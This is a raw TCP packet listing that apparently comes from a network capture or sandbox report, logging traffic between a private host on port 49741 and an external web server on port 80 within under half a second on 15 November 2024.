Nov 15, 2024 10:36:00.183027983 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.183057070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.183072090 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.183092117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.183135986 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.183407068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.183443069 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.183494091 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.183559895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.183875084 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.183928967 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.183944941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.184036970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.184082985 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.184096098 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.185000896 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.185034990 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.185058117 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.185066938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.185117006 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.185817003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.185904026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.185954094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.185957909 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.185990095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.186059952 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.216733932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.216805935 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.216842890 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.216888905 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.216900110 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.216979980 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.216991901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217027903 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217061996 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217080116 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.217097044 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217132092 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217144966 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.217166901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217201948 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217217922 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.217236042 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217268944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217300892 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.217304945 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217339993 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217360973 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.217374086 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217410088 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217422009 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.217463970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217519045 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.217861891 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217891932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217925072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217941999 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.217959881 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.217994928 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.218010902 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.228924036 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.229008913 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.229249001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.239984035 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.240084887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.240099907 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.240120888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.240159988 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.240171909 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.240199089 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.240252018 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.240780115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.240817070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.240850925 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.240869999 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.240956068 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.240992069 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.241015911 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.241703987 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.241734028 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.241769075 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.241787910 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.241805077 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.241837978 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.241838932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.241875887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.241899967 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.242016077 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.242049932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.242065907 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.242084026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.242130041 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.279700041 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.279762030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.279772043 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.279782057 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.279795885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.279805899 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.279849052 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.279942989 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.280092001 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.280164957 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.280177116 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.280211926 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.280502081 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.280513048 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.280548096 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.280600071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.280615091 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.280626059 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.280639887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.280642986 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.280670881 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.300039053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.300051928 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.300065041 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.300077915 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.300154924 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.300182104 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.300195932 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.300208092 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.300209045 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.300223112 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.300249100 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.302103043 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302115917 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302129030 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302170038 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.302179098 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302192926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302205086 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302227974 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.302252054 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.302409887 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302615881 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302659035 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.302783966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302809000 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302822113 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.302849054 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.333655119 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.333672047 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.333683968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.333695889 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.333764076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.333772898 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.333776951 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.333789110 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.333802938 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.333832979 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.333854914 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.334132910 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334161997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334172010 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.334172964 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334219933 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.334384918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334430933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334446907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334459066 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334469080 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.334496975 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.334839106 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334851980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334863901 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334877968 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.334887028 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.334908009 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.335180044 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.335207939 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.335221052 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.335243940 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.335267067 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.335280895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.335304022 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.357436895 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357454062 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357466936 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357479095 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357491970 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357497931 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357505083 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357511997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357544899 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.357589960 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.357903004 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357916117 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357942104 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357945919 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.357955933 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357969046 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.357980013 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.358009100 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.358827114 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.358876944 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.358890057 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.358896017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.358961105 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.359006882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.359038115 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.359074116 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.359117031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.359169960 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.359184980 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.359208107 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.397135019 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397160053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397166967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397241116 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397247076 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397253036 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397258997 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397351027 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397500992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397597075 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397620916 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397625923 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397830009 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397841930 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397852898 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.397907972 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.397907972 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.397973061 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.417135954 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.417174101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.417186022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.417197943 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.417260885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.417284012 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.417323112 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.417346954 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.417392015 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.417397976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.417408943 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.417484999 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.419146061 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419174910 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419193983 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419205904 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419233084 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.419259071 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.419363022 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419373989 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419410944 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.419470072 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419512033 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419524908 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419554949 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.419872999 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419886112 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419898987 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.419919014 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.419950008 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.450695038 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.450741053 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.450752020 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.450763941 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.450777054 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.450788975 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.450887918 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.451097965 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.451117992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.451138020 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.451149940 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.451176882 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.451196909 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.451492071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.451555967 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.451567888 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.451579094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.451603889 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.451639891 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.451913118 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452029943 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452042103 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452055931 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452069998 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.452089071 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452100039 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.452100992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452116013 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452121973 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452157021 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.452867031 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452898026 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452910900 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452924013 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.452966928 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.474246025 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474267960 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474308014 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474327087 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474339008 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474350929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474360943 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474370003 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474401951 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.474489927 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.474718094 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474806070 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474850893 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474853992 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.474893093 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474906921 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.474936008 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.475020885 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.475070953 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.475781918 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.475908041 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.475930929 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.475958109 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.475970984 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.476010084 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.476028919 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.476042032 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.476054907 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.476099014 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.476360083 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.476382017 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.476407051 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.476449966 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.476463079 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.476494074 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.514265060 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514277935 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514288902 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514295101 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514307976 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514422894 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514429092 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.514533043 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514543056 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514583111 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.514586926 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514600992 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514614105 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514627934 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.514662981 CET	49741	80	192.168.2.6	150.241.95.163
Nov 15, 2024 10:36:00.514870882 CET	80	49741	150.241.95.163	192.168.2.6
Nov 15, 2024 10:36:00.514915943 CET	80	49741	150.241.95.163	192.168.2.6
